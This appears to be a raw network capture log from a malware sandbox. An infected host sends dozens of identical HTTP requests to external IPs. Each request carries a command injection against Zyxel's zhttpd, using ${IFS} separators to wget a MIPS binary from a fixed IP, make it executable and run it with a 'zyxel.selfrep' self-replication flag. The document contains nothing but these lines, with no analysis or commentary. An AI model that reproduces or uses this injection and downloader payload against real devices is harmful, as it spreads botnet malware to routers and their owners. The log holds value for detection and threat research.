                                    Jan 13, 2024 19:02:25.985183954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2389192.168.2.134197642.235.16.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985187054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2390192.168.2.1360980169.119.207.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985219955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2391192.168.2.1349676194.63.135.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985254049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2392192.168.2.1342192213.5.51.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985295057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2393192.168.2.1337092176.159.207.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985327005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2394192.168.2.133459882.190.54.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985371113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2395192.168.2.1336720143.98.197.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985409975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2396192.168.2.135531081.123.97.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985455036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2397192.168.2.1344660179.1.104.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985485077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2398192.168.2.1345984219.106.75.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985533953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2399192.168.2.133483064.48.189.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985558987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2400192.168.2.135286414.195.236.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985589027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2401192.168.2.1343348219.214.58.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985619068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2402192.168.2.133794884.245.146.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985666990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2403192.168.2.134189062.86.227.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985708952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2404192.168.2.134359472.213.11.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985761881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2405192.168.2.1333250122.124.165.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985784054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2406192.168.2.133643072.117.255.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985810041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2407192.168.2.134003896.147.192.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985850096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2408192.168.2.135993612.242.180.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985879898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2409192.168.2.1352718190.63.26.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985925913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2410192.168.2.1342392116.121.198.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985976934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2411192.168.2.1345546183.245.181.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986042976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2412192.168.2.1345960203.179.138.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986068964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2413192.168.2.134368438.154.133.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986102104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2414192.168.2.1340006123.50.53.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986140966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2415192.168.2.1335446172.170.230.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986176014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2416192.168.2.1351010211.136.142.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986215115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2417192.168.2.1348020192.3.193.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986263990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2418192.168.2.135352698.87.105.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986287117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2419192.168.2.1333454174.49.115.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986344099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2420192.168.2.133839243.100.136.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986360073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2421192.168.2.1343876174.221.123.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986429930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2422192.168.2.1341944216.209.229.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986449003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2423192.168.2.135089480.220.126.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986476898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2424192.168.2.134870070.14.231.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986529112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2425192.168.2.135273097.104.12.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986561060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2426192.168.2.134294080.71.119.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986596107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2427192.168.2.134431613.180.133.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986622095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2428192.168.2.133993243.70.218.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986680031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2429192.168.2.1345810165.33.47.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986716986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2430192.168.2.133385082.1.67.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986757040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2431192.168.2.1335024170.216.216.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986789942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2432192.168.2.1347302139.18.4.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986839056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2433192.168.2.1353960210.51.182.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986875057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2434192.168.2.1359558206.161.119.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986911058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2435192.168.2.1359286130.17.10.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986927032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2436192.168.2.1346536182.39.14.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.986947060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2437192.168.2.1348450198.217.20.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987020016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2438192.168.2.1338810203.154.95.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987071991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2439192.168.2.1353612155.17.232.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987071991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2440192.168.2.1348188155.55.215.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987134933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2441192.168.2.1356696220.249.197.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987154007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2442192.168.2.1339694126.6.198.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987206936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2443192.168.2.134600476.114.98.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987226009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2444192.168.2.1335804129.93.28.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987274885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2445192.168.2.1357282141.152.17.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987320900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2446192.168.2.1358462217.37.73.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987341881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2447192.168.2.133685627.154.130.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987404108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2448192.168.2.135078057.59.155.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987459898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2449192.168.2.134152653.253.5.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987512112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2450192.168.2.1350826155.230.246.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987556934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2451192.168.2.1340808218.4.61.67443
                                    TimestampBytes transferredDirectionData
